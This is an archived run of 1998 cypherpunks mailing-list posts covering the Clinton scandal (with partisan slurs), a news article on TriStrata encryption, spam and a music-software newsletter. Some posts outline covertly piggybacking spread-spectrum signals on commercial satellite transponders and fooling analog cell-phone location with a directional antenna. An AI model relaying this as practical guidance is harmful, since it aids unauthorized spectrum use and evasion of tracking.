> On Sat, 12 Sep 1998, Tim May wrote:
> 
> > * What goes around, comes around. The Liberal puke Democrats who crucified
> > Bob Packwood, Clarence Thomas, and any number of corporate people charged
> > with "sexual harassment," are now reaping what they sowed. "If she says it
> > happened, it happened," the mantra of the feminazi left, is now apparently
> > forgotten by Patricia It's not our business" Ireland.
> 
> There's also the idea popular in some gender feminist circles that the
> imbalance of power in manager-employee relationships makes it impossible
> for genuine consent to be given. Can there be any greater power imbalance
> than the president of the United States and an intern? Where are the
> feminist cries of outrage?

"But Clinton is on their side!"

I think the gender feminists are being quiet because they supported
Clinton.  It all comes down to politics.  There are other feminists I know
(of the non-politically correct variety) that have very unkind things to
say about the man.

> > * Lawmaking is paralzyed, frozen, stillborne. This I count as a Good Thing.
> > Even better will be another 8-10 months of this nightly spectacle. No
> > Health Care Reform, no Communications Decency Act II, no Tobacco Act,
> > nothing.
> 
> In general you might be right. But for "noncontroversial" measures like
> CDA II, well, it'll be in one of the appropriations bills that will be
> approved in the next three weeks.

Actually this is *JUST* the time for moralistic political posturing.
Expect to see a great deal of "holier than thou" legislation put through
under "bringing back morality to America". (And anyone who tries to fight
such lunacy will be labeled a hedonistic scum.)

It is scandals just like this that fuel the fires of the anti-sex league.

> > * This disgraces the Presidency, which I also count as a Good Thing. There
> > were hopes that Nixon's downfall would be the end of the Imperial
> > Presidency, but, alas, the pomp and circumstance continued unabated. It's
> 
> The balance of power in the U.S. government is too tilted in favor of the
> executive and federal agencies; I think more should be returned to
> Congress and the states but don't think we're going to see that happen. To
> do that Congress needs to be willing to seize it; they're not. If we get
> Al Gore in the Oval Office we'll have business as usual.

And remember that Tipper is part of that baggage.  Expect a moralistic
crusade or two from the first lady if that happens.

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 13 Sep 1998 23:46:48 +0800
To: cypherpunks@Algebra.COM
Subject: Re: The Empire Strikes Back (was IP: Army Tests Land Warrior for 21st
Message-ID: <199809140446.GAA23564@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 13 Sep 1998, Robert Hettinga wrote:

>  "First and foremost, Land Warrior is a fighting system," Serino said. Land
> Warrior has several subsystems: the weapon, integrated helmet assembly,
> protective clothing and individual equipment, computer/radio, and software.
> 
>  The weapon subsystem is built around the M-16/M-4 modular carbine. It has
> a laser range finder/digital compass, a daylight video camera, a laser
> aiming light and a thermal sight.

Great. So now instead of having ninjas come through our windows, we will
have Borg coming through our windows.

"Citizen-unit, we are Government. Resistance is futile. You will be
assimilated. Your personality will conform to our specifications.
Resistance is futile."

All they need to do now is employ nanotechnology and get some cool "whir
whir" sound effects, a big cube-shaped HQ, and maybe a cutting beam to
carve your house and car up like roasts when they seize them.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Mon, 14 Sep 1998 01:14:05 +0800
To: "Brian B. Riley" <brianbr@together.net>
Subject: Re: radio net
In-Reply-To: <199809130024.UAA12462@mx02.together.net>
Message-ID: <v04003a03b22162c43eae@[192.168.229.5]>
MIME-Version: 1.0
Content-Type: text/plain



> Spread spectrum would have more promise as many stations could be on the
>air at once on the same frequency thus making life quite confusing for
>the T-hunters.

I investigated this application several years back and see two practical
approaches: one adapt a commercial SSB or Ham transciever to use frequency
hopping spread spectrum, or two build a pirate spread spectrum satellite
ground station.

Until recently most SSB gear didn't have the RF characteristics to use FH.
Now there are a number of inexpensive sets which use direct frequency
synthesis (as opposed to the older, and much slower, phase-locked loop
approach) and can be driven at hundreds or even thousands of hops per
second. FH helps solve two problems: first it provides privacy, second it
can mitigate or eliminate fading (which is highly time-frequency
correlated). Also, the higher the hop rate, the higher the process gain,
jam resistance and the lower the probablity of intecept (all other things
being equal).

It think it was Phil Karn (Qualcomm) who once mused that it would be rather
straightforward to masquarade a high process gain SS signal on a commercial
satellite transponder. To it's owners the SS signal would be almost
invisible, making itself known as only a very slight depression in the
transponder's gain. Effectively, this could offer an inexpensive covert
channel for tunneling packets and thwarting traffic analysis.

After the Captain Midnight episode I discussed this possibility with a very
technically knowledgeable staffer at the FCC and was assured that discovery
of such signals were beyond (at that time) the ability of commercial and
national technical (e.g., Lacrosse) means.

There's much more, but this should give you the general idea.

--Steve

---------------------------------------------------------------------
		reply to schear - at - lvcm - dot - com ---

PGP mail preferred, see  	http://www.pgp.com and
				http://web.mit.edu/network/pgp.html

RSA fingerprint: FE90 1A95 9DEA 8D61  812E CCA9 A44A FBA9
RSA key: http://keys.pgp.com:11371/pks/lookup?op=index&search=0x55C78B0D
---------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Wed, 16 Sep 1998 10:01:20 +0800
To: brianbr@together.net>
Subject: Re: radio net
In-Reply-To: <199809152029.QAA03672@mx02.together.net>
Message-ID: <v04003a00b2251e9d1bc0@[192.168.229.5]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:41 PM -0400 9/15/98, Dave Emery wrote:
>> On 9/6/98 6:20 PM, Steve Schear (schear@lvcm.com)  passed this wisdom:
>
>	I suspect that the cost of equipment and licensing and regulatory
>compliance of various sorts might make it unpleasant for loosely knit
>groups of private citizens - uplinks require competant installation
>and maintainence to keep them from causing interference to other users
>and various other problems such as RF radiation hazards under control.

Because commercial satellite gear is almost always asembled from several
vendors to form a station, and because it can be assembled in many ways and
is invariably done so by professionals, there are no U.S. satellite
equipment regulations for such gear.

>
>	On the other hand, satellites are crawling with little signals
>transmitting streams of data or voice or music to groups of receivers
>scattered over wide geographic areas, so the econmics aren't prohibitive
>for people who have some real need...
>

Surplus gear is pleantiful for those who know where to look. The hardest
part is building the SS mod/demod and that's pretty straight forward for
any competent RF engineer.

If low bandwidth links can suffice, the very large spread codes (such as
those used by GPS) can be used to place the covert channel well below the
noise floor.  GPS uses a whopping 63dB of code gain.  This in turn means a
small earth station with low power (cheap) transmitter can suffice.  I
would be surprised if you could use a backyard or even DirectTV antenna.

--Steve

---------------------------------------------------------------------
		reply to schear - at - lvcm - dot - com ---

PGP mail preferred, see  	http://www.pgp.com and
				http://web.mit.edu/network/pgp.html

RSA fingerprint: FE90 1A95 9DEA 8D61  812E CCA9 A44A FBA9
RSA key: http://keys.pgp.com:11371/pks/lookup?op=index&search=0x55C78B0D
---------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Thu, 17 Sep 1998 22:58:14 +0800
To: Dave Emery <die@pig.die.com>
Subject: Re: Mobile phone tracking, pagers, etc
In-Reply-To: <33CCFE438B9DD01192E800A024C84A192846AF@mossbay.chaffeyhomes.com>
Message-ID: <v04003a01b2272751ef06@[192.168.229.5]>
MIME-Version: 1.0
Content-Type: text/plain



>On Thu, Sep 17, 1998 at 11:56:02AM -0700, Matthew James Gering wrote:
>	There are some distinctions between CDMA, GSM, analog and TDMA
>(non GSM), in respects to exactly how easy it is to implement precision
>location meeting the FCC spec passively and on all calls at all times.
>Apparently CDMA with its very tight power control to minimize the near-far
>problem makes it fairly awkward to reliably triangulate position from
>multiple sites since the mobile may be only detectable at one site
>at any time...  What this means in practice is that some wireless
>technologies are more likely to require some definate active firmware
>intervention to do precision location, whilst others may allow it
>with no special intervention.   If the FCC allows this intervention
>to be enabled by a user, this may provide some opportunity for
>location privacy.

If you can get hold of the older, analog, 'transportable' cell phones (like
Motorola used to make) which have an antenna connector, its relatively easy
to spoof the cell ranging system.  Just connect a directional antenna
(<$75) to the port (corner reflectors which have excellent front-to-back
ratios are particularly good).  You should easily be able to fool their
signal strength based equipment into thinking your in an adjacent cell.  If
you can find high ground so much the better.

>
>
>>
>>
>	Wireless phones do currently work this way.  They listen to the
>forward control channel for a paging message that says they have got a
>call coming in and only then do they transmit.  The amount of power used
>in transmitting would quickly use up the battery if they continuously
>broadcast.  The problem with cellphone location is that they can also be
>paged with a registration request that does not cause them to ring
>or show any evidence of transmitting, but sends back a brief message
>burst (not using much battery).   This can be made to happen every
>so often, or only when polled.

Universal, an early U.S. analog cellular mfg. built this sort of unit in
the early '90s.  It was an idea ahead of its time.

>> Similarly a PSTN-IP-PSTN interface for voice could give you a static
>> phone number that you could dynamically forward anywhere untraceably.
>
>	The LEAs don't like this concept, and one of the provisions of
>the CALEA wiretap stuff is providing tracing of calls forwarded so you can't
>do this....

Yhis is a great cypherpunk service.  Allow our fellows to make free local,
VoIP, calls from our PC/PSTN links.

--Steve

---------------------------------------------------------------------
		reply to schear - at - lvcm - dot - com ---

PGP mail preferred, see  	http://www.pgp.com and
				http://web.mit.edu/network/pgp.html

RSA fingerprint: FE90 1A95 9DEA 8D61  812E CCA9 A44A FBA9
RSA key: http://keys.pgp.com:11371/pks/lookup?op=index&search=0x55C78B0D
---------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 14 Sep 1998 18:50:41 +0800
To: harald.fragner@idg.se
Subject: Re:
In-Reply-To: <TFSQQZKI@idg.se>
Message-ID: <Pine.BSF.3.91.980912231915.725A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



bork bork bork

On Mon, 14 Sep 1998 harald.fragner@idg.se wrote:

> > Why yes, yes you do.  Don't you recognize the black robe, the scythe,
> > the bony hand, the less-than-cheerful disposition?
> > 
> > See if you can figure it out.  And please hold still for a moment.  Let 
> > me just wind up here with this thing....
> 
> Ultima Online?
> 
> 
> ------------------
> Harald Fragner
> IT-avdelningen, IDG
> Tel: 08-453 60 10
> Fax: 08-453 60 05
> Email: harald.fragner@idg.se
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 14 Sep 1998 00:30:11 +0800
To: cypherpunks@cyberpass.net
Subject: ANNOUNCEMENT: DC cypherpunks meeting this Saturday, Sep 19
Message-ID: <Pine.GSO.3.95.980913222806.21162D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



There will be a cypherpunks meeting and party this Saturday, September 19
starting at 5 pm in Adams Morgan, Washington, DC.

Our two out-of-town guests are Doug McGowan from HP (who will speak about
his company's encryption products that became controversial early this
year) and David Burt of filteringfacts.org (who's here for a Christian
Coalition conference and may or may not feel like speaking about his
position on some of the anti-porn legislation likely to pass Congress).

Interested in coming? RSVP and I'll send directions.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: the scent of old bones and fresh blood <demona@demona.doldrums.dyn.ml.org>
Date: Mon, 14 Sep 1998 05:25:42 +0800
To: cypherpunks@Algebra.COM
Subject: 023026.htm
Message-ID: <199809140625.CAA00774@demona.doldrums.dyn.ml.org>
MIME-Version: 1.0
Content-Type: text/plain




                             [1]That's Racin' 
                                      
   [INLINE]
   [2]Mercury Center [3][ISMAP]-[4]This image allows you to access site
   resources
   [INLINE]
   [5]Register for free e-mail Dispatches
   Sections
   [INLINE] [6]News
   [INLINE] [7]Business & Stocks
   [INLINE] [8]Technology
   [INLINE] [9]Sports
   [INLINE] [10]Opinion
   [INLINE] [11]Living & Comics
   [INLINE] [12]Weather
   
   Classifieds & Services
   [INLINE] [13]Jobs: Talent Scout
   [INLINE] [14]Homes: HomeHunter
   [INLINE] [15]Cars: CarHunter
   [INLINE] [16]Entertainment: Just Go
   [INLINE] [17]Yellow Pages
   [INLINE] [18]Mercury News Classifieds
   [INLINE] [19]Archives: NewsLibrary
   [INLINE] [20]News agent: NewsHound
   [INLINE] [21]Membership: Passport
   
   Related Features
   [INLINE] [22]Business Home
   [INLINE] [23]Business Today
   [INLINE] [24]Tech Wire
   [INLINE] [25]Mercury News Business
   [INLINE] [26]Apple Watch
   [INLINE] [27]Asia Tech Update
   [INLINE] [28]Breaking News
   [INLINE] [29]Computing
   [INLINE] [30]Getting Ahead
   [INLINE] [31]GMSV
   [INLINE] [32]HomeHunter
   [INLINE] [33]Intel Watch
   [INLINE] [34]Microsoft Watch
   [INLINE] [35]Money Tree
   [INLINE] [36]Silicon Valley 150
   [INLINE] [37]Mortgage Watch
   [INLINE] [38]Motley Fool
   [INLINE] [39]Stocks
   [INLINE] [40]Talent Scout
   [INLINE] [41]Greg Carpluk
   [INLINE] [42]Dan Gillmor
   [INLINE] [43]Adam Lashinsky
   [INLINE] [44]Chris Nolan
   [INLINE] [45]Cheryl Shavers
   [INLINE]
   [INLINE] [46]Contact Us
   [INLINE] [47]About this page
   [INLINE]
   [INLINE]
   
   Posted at 12:54 a.m. PDT Sunday, September 13, 1998 
   
Net Security Takes Key Step

   BY JAMES J. MITCHELL
   Mercury News Staff Writer
   
   TriStrata Security Inc. of Redwood Shores isn't your usual Internet
   start-up. Its chief executive recently gave up the reins of a $2
   billion subsidiary to run it. The company's founder and chairman is
   the man who invented the personal identification number (PIN).
   America's largest accounting firm is already endorsing it. And its
   promise lured some of the best-connected executives onto its board.
   
   Three months ago, Paul Wahl was running German software maker SAP AG's
   U.S. operations, which has 5,000 employees and first-half 1998 sales
   of nearly $1 billion. Last week he became chief executive of
   TriStrata, a 35-person start-up that makes Internet security software.
   
   The reason for Wahl's sudden career change and move from Philadelphia
   is a tremendous opportunity . . .to make Internet history by changing
   the way the world keeps information secure on the Internet, says Wahl,
   46.
   
   That same dream brought John Atalla out of retirement in 1993 to form
   TriStrata. Atalla, now 74, decades ago created the PIN system and the
   security used today in 80 percent of the world's automatic-teller
   machines. He was enjoying the beaches of the world when friends in the
   banking industry asked him to work on the problem of Internet
   security.
   
   Both men believe TriStrata's software -- which works efficiently with
   voice and video as well as with data -- will revolutionize electronic
   commerce, enabling companies to create virtual private networks and
   permitting, for example, the secure and inexpensive sale of software,
   music and videos over the Internet.
   
   Some outside observers agree.
   
   PricewaterhouseCoopers LLP, which is the largest of the Big Five
   accounting firms and has 2,200 employees devoted to Internet security,
   believes this could be the de facto standard for encryption
   technology, says Jim Coriston, a PWC managing partner. TriStrata
   software is being implemented throughout the firm, which is also
   offering the product to its clients.
   
   It's a whole different approach to cryptography, says Larry Dietz,
   director of information security and legal strategies for Current
   Analysis, a market research firm. Its key principles make a lot of
   sense. But some critics question whether TriStrata's product is as
   secure as the company claims.
   
   And the company faces tough competition from established security
   companies such as Network Associates Inc. of Santa Clara and Secure
   Computing Corp. of San Jose, as well as from computer vendors like IBM
   and Hewlett-Packard Co., which include security in their products.
   
   Atalla rejected the traditional approach for enterprise security using
   public key encryption, a system that uses two keys, both controlled by
   the user: a private key, which must be kept secret, and a public key,
   which can be freely distributed. Such systems can be broken, have
   performance limitations and have restrictions on the strength of the
   key that can be exported.
   
   Instead, he turned to the one-time pad approach invented in 1917 by
   Gilbert Vernam. It uses randomly generated numbers that are never
   replicated in the exact same sequence. The one-time pad is
   theoretically unbreakable, cryptographers agree. But it hasn't been
   useful because it requires so much computing and telecommunications
   power.
   
   Atalla decided that the great advances in computer memory and
   processing technology and today's powerful and relatively inexpensive
   communications capability made the Vernam cipher practical, and he
   built his security system around it. As a result, each encrypted
   document has a different code.
   
   The system is so fast, so inexpensive and provides such a good audit
   trail that it will lead companies to make encrypted transmissions the
   rule instead of the exception, Atalla and Wahl say.
   
   The federal government, including the National Security Agency and the
   FBI, has cleared it for export because the system allows access to
   specific documents for which an appropriate court order has been
   issued. The company expects the product to be received warmly
   overseas, since the U.S. government cannot decode information at will.
   But it's unclear whether this feature will diminish foreign concerns
   about U.S. security products.
   
   Skeptics wonder whether the company has created a sufficiently large
   string of random numbers to approximate randomness, Dietz says.
   
   And TriStrata's approach is so different it won't be an easy sell. It
   requires companies to transform their security systems, a decision
   likely to be made by the chief executive and chief information
   officers, Dietz says, not the people who normally purchase security
   software.
   
   Here the many contacts of Atalla, Wahl and TriStrata's directors
   should prove useful.
   
   Atalla is well known in the high-tech community. At Bell Laboratories
   his research resulted in his patents for the metal oxide semiconductor
   (MOS), a key component of modern electronic devices. Then he
   co-founded Hewlett-Packard Associates and Hewlett-Packard Laboratories
   and directed the company's solid-state division. He founded Atalla
   Corp. in 1973 and sold it to Tandem Computers Inc. in 1987.
   
   Atalla was able to attract to TriStrata a star-studded board that
   includes John Young, former chief executive of HP; Tom Perkins,
   partner in the venture capital firm of Kleiner Perkins Caufield &
   Byers; and William Zuendt, retired president of Wells Fargo & Co. and
   former chairman of MasterCard.
   
   The company released its first product last November. As it prepared
   to move from R&D to large-scale sales, it added as a director David
   Beirne, a general partner of venture capital firm Benchmark Capital.
   Beirne, who had made his mark as one of the most successful executive
   recruiters before joining Benchmark last year, approached Wahl about
   the CEO job two months ago.
   
   Wahl, quite content at SAP, was negotiating a move back to Europe with
   the company when Beirne called and persuaded him to fly here to take a
   look at TriStrata. After a second quick visit, Wahl and his wife
   decided to come west.
   
   TriStrata is unlikely to become a huge employer; Wahl expects the
   workforce to perhaps double to 70 in the next year or two and reach
   200 over five years.
   
   But it's impact on the Internet could be quite dramatic. And Wahl
   found that attraction irresistible.
     _________________________________________________________________
   
   Write James J. Mitchell at the Mercury News, 750 Ridder Park Drive,
   San Jose, Calif. 95190; phone (408) 920-5544; fax (408) 920-5917; or
   e-mail to [48]JMitchell@sjmercury.com .
   
   [INLINE]
   [INLINE]
   [49]Return to top [50][ISMAP]-[51]This image allows you to access site
   resources
   
   [INLINE]
   [52]That's Racin' 
   (c)1997 - 1998 Mercury Center. The information you receive online from
   Mercury Center is protected by the copyright laws of the United
   States. The copyright laws prohibit any copying, redistributing,
   retransmitting, or repurposing of any copyright-protected material.

References

   1. http://www.mercurycenter.com/event.ng/Type=click&ProfileID=442&RunID=1618&AdID=1530&GroupID=1&FamilyID=1&TagValues=154.197.298.414&Redirect=http:%2F%2Fwww.thatsracin.com
   2. http://www.mercurycenter.com/
   3. http://www.mercurycenter.com/graphics/toolbar.map
   4. LYNXIMGMAP:http://www.mercurycenter.com/business/top/023026.htm#toolbar
   5. http://www.passport.realcities.com/osform/AuthenticateService?osform_template=/sjm/frame.oft&content=benefits.html&final_template=
   6. http://www.mercurycenter.com/front/
   7. http://www.mercurycenter.com/business/
   8. http://www.mercurycenter.com/gmsv/
   9. http://www.mercurycenter.com/sports/
  10. http://www.mercurycenter.com/opinion/
  11. http://www.mercurycenter.com/svlife/
  12. http://www.mercurycenter.com/weather/
  13. http://www.talentscout.com/
  14. http://www.homehunter.com/siliconvalley/
  15. http://enterprise.sjmercury.com/products/carhunter/
  16. http://www.justgo.com/bayarea/
  17. http://www.zip2.com/bayarea/
  18. http://classifieds.sjmercury.com/classifieds/indexnojava.html
  19. http://www.mercurycenter.com/resources/search/search_archive.shtml
  20. http://www.newshound.com/
  21. http://www.passport.realcities.com/osform/AuthenticateService?osform_template=/sjm/frame.oft&content=benefits.html&final_template=
  22. http://www.mercurycenter.com/business/
  23. http://www.mercurycenter.com/today/today_business.shtml
  24. http://www.mercurycenter.com/business/tech/
  25. http://www.mercurycenter.com/business/business_section.shtml
  26. http://www.mercurycenter.com/business/apple/
  27. http://www.mercurycenter.com/business/asia/
  28. http://www.mercurycenter.com/breaking/
  29. http://www.mercurycenter.com/compute/
  30. http://www.mercurycenter.com/business/business_getahead.shtml
  31. http://www.mercurycenter.com/gmsv/
  32. http://www.mercurycenter.com/realestate/
  33. http://www.mercurycenter.com/business/intel/
  34. http://www.mercurycenter.com/business/microsoft/
  35. http://www.mercurycenter.com/business/moneytree/
  36. http://www.mercurycenter.com/business/sv15098/150home.htm
  37. http://www.mercurycenter.com/realestate/mortgage/
  38. http://www.mercurycenter.com/stocks/motleyfool/
  39. http://www.mercurycenter.com/stocks/
  40. http://www.mercurycenter.com/talentscout/
  41. http://www.mercurycenter.com/columnists/carpluk/
  42. http://www.mercurycenter.com/columnists/gillmor/
  43. http://www.mercurycenter.com/columnists/lashinsky/
  44. http://www.mercurycenter.com/columnists/nolan/
  45. http://www.mercurycenter.com/columnists/shavers/
  46. http://www.mercurycenter.com/business/business_feedback.shtml
  47. http://www.mercurycenter.com/business/business_help.shtml
  48. mailto:JMitchell@sjmercury.com
  49. http://www.mercurycenter.com/business/top/023026.htm#backtotop
  50. http://www.mercurycenter.com/graphics/toolbar.map
  51. LYNXIMGMAP:http://www.mercurycenter.com/business/top/023026.htm#toolbar
  52. http://www.mercurycenter.com/event.ng/Type=click&ProfileID=442&RunID=1618&AdID=1530&GroupID=1&FamilyID=1&TagValues=154.197.298.414&Redirect=http:%2F%2Fwww.thatsracin.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<k9bb50g7@auto.sixdegrees.com>
Date: Mon, 14 Sep 1998 01:57:46 +0800
To: "Joe Cypherpunk"<cypherpunks@toad.com>
Subject: Larry Gilbert
Message-ID: <199809140644.XAA17608@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Just a quick update from sixdegrees(tm). Unfortunately Larry 
Gilbert (irving@pobox.com) asked not to be listed as your 
contact with sixdegrees.

We also wanted to make sure you were aware that you currently 
have no other confirmed contacts, so it will be hard for you to
have a productive sixdegrees experience. As you probably know, 
without any confirmed contacts, you won't get any results from our 
networking searches. 

So, we just wanted to recommend that you head over to 
http://www.sixdegrees.com , log-in, and go to MY CONTACTS 
to list additional relationships. 


====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================


E.DB.BRESP.3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@dueprocess.com>
Date: Mon, 14 Sep 1998 02:20:04 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
Message-ID: <3.0.5.32.19980914032054.007d3b40@pop.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain



> On Sat, 12 Sep 1998, Tim May wrote:
> 
> There's also the idea popular in some gender feminist circles that the
> imbalance of power in manager-employee relationships makes it impossible
> for genuine consent to be given. Can there be any greater power imbalance
> than the president of the United States and an intern? Where are the
> feminist cries of outrage?

Could be because, at least from what I read in the report and from other
sources, Monica came onto Clinton.  One could make the argument that the
imbalance of power was the other way around ;)

On another note, instead of the report, it may be extremely more
interesting to read:
http://www.reagan.com/HotTopics.main/document-9.1.1998.1.html

I can't vouch for the veracity of all of those listed.  Of those
individuals, however, with whom I am familiar by way of the media, it is
accurate - and eerie, to say the least.





***************************************************************************
Lynne L. Harrison, Esq.         |  "If we are all here,
Poughkeepsie, New York          |   then we are not
mailto:lharrison@dueprocess.com |   all there."
http://www.dueprocess.com       |      - old Zen saying
*************************************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "LiveUpdate News" <update@annex.liveupdate.com>
Date: Mon, 14 Sep 1998 02:57:03 +0800
To: cypherpunks@toad.com
Subject: Crescendo News - September 1998
Message-ID: <039975445070e98ANNEX@annex.liveupdate.com>
MIME-Version: 1.0
Content-Type: text/plain



CRESCENDO NEWS - September 1998

Well, it's almost fall here in New England - we're looking 
forward to the foliage turning color and the snow starting to 
fall.  The leaves up North aren't the only things that are 
about to change - we're working harder than ever to deliver the 
best music products on the Internet.  You're receiving this 
email because you downloaded Crescendo in the past, and we want 
to keep you up to date with some of the exciting things that 
are happening at LiveUpdate.  We hope you are enjoying Crescendo!

These are some of the items included in this newsletter:

* Crescendo Forte Showcase is now open
* Crescendo PLUS version 4.0 Beta 2 now includes LiveSynth 
* Crescendo Forte featured on RealNetworks Music Showcase
* Crescendo Forte featured in Keyboard Magazine's "net smarts"
* Re-enabling Crescendo after installing other plugins
* Controlling Crescendo using JavaScript
* What would you like to see in future versions of Crescendo?
* Subscribing / Unsubscribing

----------------------------------

CRESCENDO FORTE SHOWCASE IS NOW OPEN

On September 10th, 1998, the long awaited Crescendo Forte 
Showcase publicly opened its doors.  Crescendo Forte is an 
add-on to RealNetworks' RealPlayer G2, and allows MIDI music 
to be synchronized with other media types such as RealAudio, 
video, animation, and text.  Rob Glaser, CEO of RealNetworks 
sums Crescendo Forte up best by saying "Crescendo Forte Rocks!".  
Crescendo Forte has been called "unbelievable", and it has been 
said to be "Music the way it was meant to be heard." See (and 
hear) for yourself what all the excitement is about 
at the Crescendo Forte Showcase, found at 
http://www.liveupdate.com/cforte/showcase.html.  

After you've heard the difference Crescendo Forte makes to 
music on the Internet, get Crescendo PLUS version 4.0 Beta 2 
for an upgrade to LiveSynth that makes the music sound even 
better!  (Keep reading for more details...)

----------------------------------

CRESCENDO PLUS VERSION 4.0 BETA 2 NOW INCLUDES LIVESYNTH

It's finally here!  Crescendo PLUS version 4.0 Beta 2 is 
now available, and includes streaming, a software wavetable 
synthesizer (for more realistic instrument sounds), and more.  
If you have purchased a Crescendo PLUS subscription within the 
past year, you should have already received an email giving 
you instructions on how to download version 4.0 Beta 2.  If 
you haven't experienced Crescendo PLUS yet, now is the time to 
do so.  LiveSynth uses the processing power of your PC to play 
MIDI music using real instrument samples.  Therefore a Pentium 
processor is required to take advantage of LiveSynth.  If you 
don't have a Pentium processor, you will still be able to take 
advantage of streaming and the other features found in Crescendo 
PLUS.  For a short time, the Crescendo PLUS subscription which 
entitles you to both the shipping 3.0 version of Crescendo and 
4.0 Beta 2 including LiveSynth is available for $19.95 at our 
on-line store, https://secure.liveupdate.com.  

----------------------------------

CRESCENDO FORTE FEATURED ON REALNETWORKS MUSIC SHOWCASE

Atlantic Records, Polygram, Capitol Records, Warner Brothers, 
Sony Music, Maverick, Virgin Records can all be found on the G2 
Music Showcase area on the RealNetworks web site.  And who should 
be featured among these titans of the music industry?  LiveUpdate, 
of course!  Visit the G2 music showcase at 
http://www.real.com/showcase/realplayer/music.html 
and hear how the combination of RealPlayer G2 and Crescendo Forte 
are redefining the way music is heard on the Internet.

----------------------------------

CRESCENDO FORTE FEATURED IN KEYBOARD MAGAZINE'S NET SMARTS

Are you hungry for more information on creating content for
Crescendo Forte?  Would you like to know what Dan Barrett, author
of "net smarts" for Keyboard Magazine has to say about Crescendo 
Forte?  Read the rave artice in the October issue of Keyboard 
magazine, where Dan Barrett says, "It's so satisfying to encounter 
a product that just plain works" and "The pre-beta version of 
Crescendo Forte installed easily on my PC and ran transparently 
inside of RealPlayer G2, keeping the audio and MIDI streams (to 
my ears) in perfect sync.  It's definitely worth a look."  Get it 
at your local newsstand, or check out Keyboard Magazine online 
at http://www.keyboardmag.com.

----------------------------------

RE-ENABLING CRESCENDO AFTER INSTALLING OTHER PLUGINS

Probably the most common question our on-line helpdesk 
(helpdesk@liveupdate.com) looks something this:

"I have been using Crescendo to play MIDI on-line for over two
years now, and I love it.  I just installed QuickTime 
to play a movie, but now when I go to a web site that has MIDI, 
Crescendo doesn't load any more.  I want my Crescendo back!"

If this looks familiar to you, we have good news - you can
have your QuickTime and Crescendo too!  Netscape decides which
plugin will be used for a given media type based on their
position on your Netscape/program/plugins directory.  If you
go to the Help/About Plugins from the Navigator window, you
will probably see "LiveUpdate Crescendo" listed, but one or
more of the MIME types listed there will most likely be listed
as disabled.  To cure this problem, we have created a page
which outlines how to re-arrange your plugins directory so
that Crescendo will be enabled for all MIDI MIME types, while
co-existing with other plugins such as QuickTime.  Surf to
http://www.liveupdate.com/atlashelp.html for more details!

----------------------------------

CONTROLLING CRESCENDO USING JAVASCRIPT

Are you a JavaScript programmer?  Would you like to see how
Crescendo can be controlled using JavaScript?  We have created
a page that demonstrates Crescendo being controlled by
JavaScript methods and standard HTML buttons.  See it in
action at http://www.liveupdate.com/wiretest.html.  To
look "under the hood," just view the page's source to see how
simple it is to control Crescendo through JavaScript.

----------------------------------

WHAT WOULD YOU LIKE TO SEE IN FUTURE VERSIONS OF CRESCENDO?

We are still looking for new ideas to be included in future
versions of the Crescendo player.  If you have any cool features
you would like to see added to Crescendo, send them to 
feedback@liveupdate.com.  Who knows - maybe your suggestion will
makes its way into the next version of Crescendo!

----------------------------------

SUBSCRIBING / UNSUBSCRIBING

Note: Messages from LiveUpdate to this list will not be sent any 
more frequently than once a month, and your information has not, and 
will not, be given to others or sold.  If you wish to unsubscribe 
from this list, or if this message has been forwarded to you by a 
friend and you would like to subscribe to our newsletter, please 
send a message to newsletter@liveupdate.com.

*******************************************

Spread the Music!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 14 Sep 1998 08:34:48 +0800
To: "Lynne L. Harrison" <lharrison@dueprocess.com>
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <3.0.5.32.19980914032054.007d3b40@pop.mhv.net>
Message-ID: <Pine.GSO.3.95.980914063037.25313E-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Careful with your attributions. I don't believe Tim wrote what you said he
did.

As for Monica-Clinton, what appears to be the case doesn't matter in some
ideologies. Can meaningful consent be given with such a power imbalance?

-Declan


On Mon, 14 Sep 1998, Lynne L. Harrison wrote:

> > On Sat, 12 Sep 1998, Tim May wrote:
> > 
> > There's also the idea popular in some gender feminist circles that the
> > imbalance of power in manager-employee relationships makes it impossible
> > for genuine consent to be given. Can there be any greater power imbalance
> > than the president of the United States and an intern? Where are the
> > feminist cries of outrage?
> 
> Could be because, at least from what I read in the report and from other
> sources, Monica came onto Clinton.  One could make the argument that the
> imbalance of power was the other way around ;)
> 
> On another note, instead of the report, it may be extremely more
> interesting to read:
> http://www.reagan.com/HotTopics.main/document-9.1.1998.1.html
> 
> I can't vouch for the veracity of all of those listed.  Of those
